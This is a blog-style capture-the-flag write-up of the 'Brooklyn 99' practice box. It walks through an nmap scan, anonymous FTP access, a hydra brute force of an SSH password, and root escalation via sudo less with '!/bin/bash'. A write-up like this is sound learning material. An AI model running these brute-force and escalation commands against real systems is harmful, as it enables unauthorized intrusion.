Brooklyn 99 writeup (Cops, amirite?)

,

This is going to be a very short writeup for a very, VERY short and sweet box.

Recon

The recon starts, as always, with nmap. After going through ALL the ports, I found 3. FTP, SSH and HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Nmap 7.91 scan initiated Wed Feb 17 12:12:45 2021 as: nmap -sV -sC -oA brooklyn -p- 10.10.32.140
Nmap scan report for 10.10.32.140
Host is up (0.078s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.11.XXX.XXX
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP

Okay, we see that FTP has anonymous login enabled, and there is one file. Only one. Let’s see!

1
2
3
4
5
cat note_to_jake.txt

From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

We’ll get back to this later. Right now, we still have HTTP to go through!

HTTP

When navigating to the website, we see only one image and some text:

The screenshot of the web server

Byoudiful. But nothing really spectacular. Maybe it’s running on some great web framework paid for by taxpayers!

Yeah, nah

Yeah, nah. Seems we have no framework here, and after confirming with a lengthy gobuster session, I confirmed this. Nothing hiding here, no no no!

A note on the steganography line

There is a line in the source saying there is some steganography hidden inside the picture. Well yes, sure, maybe, but we won’t need it. Let’s try following the lead from Amy’s note before we turn back.

Rocking the world of Jake Peralta

Okay, from FTP we found that Jake has a weak password on his account. Classic Jake, eh? To be honest, I know people like that. We all know people like that. Is there any way to find out what his password is? We may need more than one head for this job. Enter hydra.

1
hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.32.140

Luckily, this command is really simple to use. -l for the username (we only need one), -P takes a file with passwords (good ol’ rockyou.txt), and then we have the protocol and IP address.

In about a second or two, we get our password.

1
2
3
4
5
Hydra starting at 2021-02-17 12:51:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.32.140:22/
\[22\]\[ssh\] host: 10.10.32.140   login: jake   password: ********************

(I wish to protect officer Jake Peralta’s privacy, so his password is obscured)

Getting a shell

After finding jake’s password, we can log into the machine using regular ssh.

1
2
3
4
ssh jake@10.10.32.140
jake@10.10.32.140's password: 
Last login: Wed Feb 17 11:27:31 2021 from 10.11.XXX.XXX
jake@brookly_nine_nine:~$

Yay! We’re in as Jake Peralta! Now, to keep things simple, before I upload some massive LinEnum.sh script, I just run sudo -l to see what’s going on in there.

1
2
3
4
5
6
7
jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
jake@brookly_nine_nine:~$

Seems that jake can run /usr/bin/less as root with no repercussions. Now there are two ways to easily get the root flag, and if fancy takes us, we can just go for a root shell while we’re at it.

Less is more

Less, as it turns out, is a very interesting little gadget. It gives you a nice pagereader which can scroll up, down, left and even right! But what’s more, it has a similar command prompt to vi. Press colon, insert a less command and it just works. However, from GTFObins we can see that less has a sudo exploit for less.

Let’s see how it works!

1
sudo less /etc/passwd

This opens less to read the /etc/passwd file. Since we can run less as root without a password, we get a nice less interface showing /etc/passwd. From there, we can use this command:

1
!/bin/bash

to get a lovely root shell. System status: pwned.

1
jake@brookly_nine_nine:~$ sudo less /etc/passwd

The less window

Root soon

One enter key later, we’re in root shell.

Root shell!

Closing words

Okay, I may have not done this box justice, I skipped a nice stego challenge, but it turns out to be just one more route (yes, after rooting the box, I looked at other people’s writeups to find if anyone got the stego challenge and what it brought). It was a way in, to be sure, but it was less familiar and more CTF-y to me.

All in all, a great box to put out a nice blog post about. Done in about 15 minutes, I encourage all of you to give it a shot.